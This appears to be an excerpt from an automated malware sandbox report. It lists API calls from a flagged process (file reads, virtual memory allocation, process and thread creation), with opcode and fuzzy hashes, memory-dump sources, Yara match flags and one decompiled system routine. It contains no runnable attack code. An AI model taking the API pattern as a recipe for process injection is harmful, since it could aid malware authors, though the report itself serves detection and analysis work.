                                                • Opcode ID: c351b108c95beed28844e6bcbf042d29916cb63c099533faf6bf3cac35903671
                                                • Instruction ID: 32e43027325b75291671a3d7bbdae94a203e1c89b196b770cfe8f1f5a8849532
                                                • Opcode Fuzzy Hash: c351b108c95beed28844e6bcbf042d29916cb63c099533faf6bf3cac35903671
                                                • Instruction Fuzzy Hash: E3113AB6200108AFDB14DF99CC81EEB77ADEF89350F158248FE09A7241C630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 0036A025
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 89860f9f79cba53636d4ff4ff0a0f1da0634c7be86dad85901734ccb60623c9b
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: DFF0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158248BE1DA7241D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 0036A025
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 44288736e92017c9448e1bb6f29f1988f5e4c650516a4e17b86a1c218d2c7458
                                                • Instruction ID: b918beca1f6690d480316562cd1ecc7025f0e4515b51b6e380e8746cef0c8855
                                                • Opcode Fuzzy Hash: 44288736e92017c9448e1bb6f29f1988f5e4c650516a4e17b86a1c218d2c7458
                                                • Instruction Fuzzy Hash: 2BF0A5B2210108AFCB04DF99DC90EEB77ADAF8C314F168249FE1DE7245C630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 0036A149
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 0be28a7f3c28dd71a496608cebb81c5e12cb20bd006f01469d701d0924bdb026
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 86F015B2210208ABCB14DF89CC81EAB77ADAF88750F118248BE08A7241C630F811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5418c0e1de9bd3d100e98e1a624892aa9afb19347cdd0ceeb0772f5ae87db6b9
                                                • Instruction ID: a0b430941a78cf2bcdd3d5834b02dc05fb0d4520bb5f8cfd70213bc0f707476d
                                                • Opcode Fuzzy Hash: 5418c0e1de9bd3d100e98e1a624892aa9afb19347cdd0ceeb0772f5ae87db6b9
                                                • Instruction Fuzzy Hash: 9C90026139180442D200656A4C19B57000A97D0383F91D115A0244554CCD558861A561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00368CF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A26D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A304
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 496098f8713fed42a744c2497ba528c4d033057b51e4cffacd5030772e862899
                                                • Instruction ID: 51eb6f3668ea413c39a01cbb6bbb36d668b8473e861e59755bba70c97a7979f7
                                                • Opcode Fuzzy Hash: 496098f8713fed42a744c2497ba528c4d033057b51e4cffacd5030772e862899
                                                • Instruction Fuzzy Hash: D71133B2210108AFCB04CFA9DC80DEB77ADAF9C350F108259FA4D97242C630E811CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0035AD42
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                • Instruction ID: d6b1370be4a57ad8d0f6b1059867a9a92ab1b4ffdd2be6cd7c605be34b620951
                                                • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                • Instruction Fuzzy Hash: E60152B5D0010DB7DB10EAA4DC42FDDB3B89B14309F008294ED089B145F631EB488B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A304
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 11ad331afd717686f82e59ef272b8fd90b624a69a104a1095b818994a60cff8b
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 2A01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0035F020,?,?,00000000), ref: 00368DBC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 83e413b34ed275f49d33cd640d9acb1914596b3e59c460f106901387495987fe
                                                • Instruction ID: 8852fa155cccab07787125c86e7cefd6e1a1d13d51775e7160101924ffa473e3
                                                • Opcode Fuzzy Hash: 83e413b34ed275f49d33cd640d9acb1914596b3e59c460f106901387495987fe
                                                • Instruction Fuzzy Hash: 13E092333903043AE331659DAC03FA7B39CDB95B21F554026FB0DEB2C1D996F80142A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A304
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91e25ae8e503866701ff2781f58ed2b2f8f6caafc5e7f2b8a5cf2bcaaddbb039
                                                • Instruction ID: 6d1dcf06b4a48b4ad113e1476baf4ab0d90c877e3349d3aff34d9ffed8d5bde9
                                                • Opcode Fuzzy Hash: 91e25ae8e503866701ff2781f58ed2b2f8f6caafc5e7f2b8a5cf2bcaaddbb039
                                                • Instruction Fuzzy Hash: CFE0B6B6210409AF8B04CF88EC91DEB73ADFB8C700710860CFA5DC7204C634E9528BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00364506,?,00364C7F,00364C7F,?,00364506,?,?,?,?,?,00000000,00000000,?), ref: 0036A22D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 069f56ed3eb089d07badc9a62d4a2eb64a12e3c5f2c14a543bcc28b3aad6e51a
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: B6E046B1210208ABDB14EF99CC41EA777ADEF88750F118558FE086B242C630F911CBF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0035F1A2,0035F1A2,?,00000000,?,?), ref: 0036A3D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: ff4a42e147b8a66a65a238d61904a6f08b03f338af7e19bf9cb3d80caa004780
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 1BE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA086B241C930E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,00358CF4,?), ref: 0035F6CB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                • Instruction ID: 5e731e428d73f0739ea7cc3390b0b0f771c171b41a349aa9f13d513c9ed08f2d
                                                • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                • Instruction Fuzzy Hash: 29D0A7717903043BE610FAA49C03F2732CD6B45B01F494074FA48DB3D7D950E4004165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 7ce75533347c8accbcb2df1633bf973149e1b9f6e4619cfead146cbd5ac53cbe
                                                • Instruction ID: 7784b6f138f659315f719480edebee278935668a74cd89896fdfd3da4a38357e
                                                • Opcode Fuzzy Hash: 7ce75533347c8accbcb2df1633bf973149e1b9f6e4619cfead146cbd5ac53cbe
                                                • Instruction Fuzzy Hash: 50D022353480240ECB06CA88FC02C7D7378E680712B5405AFEA04CA5C1EA99150F87D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d6f9d9de102acc20d422f62b49f8d9b09360ec98c0960298c41ac9dcad870f06
                                                • Instruction ID: 13c6a4b1a8ff858270073191fd71aeabd19f257322442aad06485a4edea83192
                                                • Opcode Fuzzy Hash: d6f9d9de102acc20d422f62b49f8d9b09360ec98c0960298c41ac9dcad870f06
                                                • Instruction Fuzzy Hash: 14B02B71A810C5C5D600D3600A0C727394077C0340F12C011D1020240B477CC080F1F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 53%
                                                			E02EAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = E02E5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E02EA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E02EA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EAFDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EAFE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EAFE2B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 4abd4a69ba57bd6d3e675f65847f43a976e465efe522ed878009af85d82ef345
                                                • Instruction ID: 5a9ec472605bd85b14da62c63494681faeee1d890ac2ef3c3f2f952a37fdd5f8
                                                • Opcode Fuzzy Hash: 4abd4a69ba57bd6d3e675f65847f43a976e465efe522ed878009af85d82ef345
                                                • Instruction Fuzzy Hash: C5F0FC325802017FE6201A55DC45F73BF5BDB44730F249315F618595D1EA62F860C6F4
                                                Uniqueness

                                                Uniqueness Score: -1.00%